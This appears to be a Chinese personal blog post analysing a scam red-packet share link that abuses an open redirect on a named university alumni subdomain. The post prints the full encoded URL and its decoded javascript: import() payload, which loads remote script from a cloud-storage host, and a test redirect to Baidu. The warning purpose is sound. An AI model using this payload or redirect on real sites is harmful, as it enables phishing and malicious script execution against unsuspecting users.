扒一扒冒充「海底涝」等红包分享

今天收到家人在群里给我的分享，居然还给我来了一个私发。

不知道大家有没有类似的案例，其实我有在其他的一些大众群里看到过，但是其他人我一般不管。

我为什么要在左下角地方，圈一圈一个矩形呢？那是因为，一般的正规分享都会有来源显示。

哪怕是App分享的，也都会有一些显示来源。

这个点进去之后是这样的截图。

我第一眼，就是一眼假！

一眼垃圾广告！

为什么？经验！尤其是顶部那几个字，“活动经官方认证，真实有效！”，还给你拉第一个感叹号！！！

生活经验告诉我，哪些医院门口挂着牌子“省市医保定点单位”大概率是私立医院，哪些地方挂着“严禁赌博嫖娼”，那基本都是高发区，你看看宾馆，KTV，酒吧，是不是挂这些牌子特别多，因为这是特种经营行业！

道理是差不多的。

接下来开始讲一些计算机基础。

例如，微信现在改版后，尤其贴心的把网址给你显示了，按照以前是没有显示的。

这网址，有经验的或者有点文化水平的人，都能看出来，edu就是教育的意思，这个.edu.cn的域名一般人是注册不了的，只有大学这样才能注册，哪怕你是很牛逼的高中，也许都注册不了，反正我的高中母校最后用的还是.net的域名。

我随便搜了一下杭州学军，也只是.com的域名，都拿不到.edu.cn的域名。

所以.edu.cn和.gov.cn的域名是很正规且珍贵的，而且信任的权重会很高。

那么，这些人其实是利用了这个大学网站的一个小分站的一个跳转漏洞进行的传播广告。

原来的网址复制出来是这样的：

https://xypt.zjgsu.edu.cn/xyAuthBase?redirect_uri=%6a%61%76%6f%6e%72%65%61%64%79%73%74%61%74%65%63%68%61%6e%67%65%61%73%63%72%69%70%74%26%23%35%38%3b%69%6d%70%6f%6e%72%65%61%64%79%73%74%61%74%65%63%68%61%6e%67%65%6f%72%74%26%23%34%30%3b%26%23%33%39%3b%26%23%34%37%3b%26%23%34%37%3b%6a%73%6e%26%23%34%36%3b%6f%73%73%2d%61%63%63%65%6c%65%72%61%74%65%26%23%34%36%3b%61%6c%69%79%75%6e%63%73%2e%63%6f%6d%26%23%34%37%3b%26%23%78%37%32%3b%26%23%78%37%32%3b%26%23%34%36%3b%26%23%31%30%36%3b%26%23%31%31%35%3b%26%23%78%32%37%3b%26%23%78%32%39%3b&8yPPkb3QBr=VvU7ZGujyubdmN6kSHG

我的天，网址太长了，我都没法引用。

redirect的一个跳转，跳转到一个JS，而这个JS恰恰居然还放在某一个知名的云平台上。

第一次解码之后是这样的：

https://xypt.zjgsu.edu.cn/xyAuthBase?redirect_uri=javonreadystatechangeascript:importreadystatechangeort('//jsn.oss-accelerate.aliyuncs.com/rr.jss')

因为有转义，继续转码。

https://xypt.zjgsu.edu.cn/xyAuthBase?redirect_uri=javonreadystatechangeascript:importreadystatechangeort('//jsn.oss-accelerate.aliyuncs.com/rr.js')

最终是这样的。

跳转到这个地方：

//jsn.oss-accelerate.aliyuncs.com/rr.js

然后，我尝试自己重写这个代码。

例如我跳转到百度，我测试了一下，还真成功。

https://xypt.zjgsu.edu.cn/xyAuthBase?redirect_uri=https://www.baidu.com

其实这个小分站，xypt是校友平台的意思。

如果谁认识这所大学的人，最好提醒一下对方。

我发现大学的一些站点很多都疏忽，我也偶尔收到一些“考试答案”“真题泄露”等邮件（因为我也经常参加考证考试），发送的邮件也都是来自于.edu.cn的邮箱！

来自这种邮箱的邮件，很多时候会给很高的信任度，所以导致群发也成功。

那么，这种网页传播到底是干嘛的呢？

我粗略看了一下它这个加载的js代码。

先是向 某个站 发起请求，附带当前页面的 URL 作为参数，然后把你网页替换，替换成啥？我没测试了。

因为他这个红包程序，现在阶段就是让你不断的分享分享，类似砍一刀，最后分享的人多了之后，他在后台就可以控制这个页面，最后这个页面也许就会被替换成黑产网站。

这个某个站，whois信息在这里，注册是香港的。

是在这家注册的。

为啥会注册那么奇怪的域名，.icu？？因为便宜啊！

才1.3美金。

凡是我看到.top之类的域名，我几乎都认为这些网站都有点问题，哪怕你真要好好做网站，也别注册这种高危域名。

我也在网上搜了一下类似的骗局。

凡是多留一个心眼！

尤其善用搜索引擎，搜一下，肯定有类似的骗局发生过。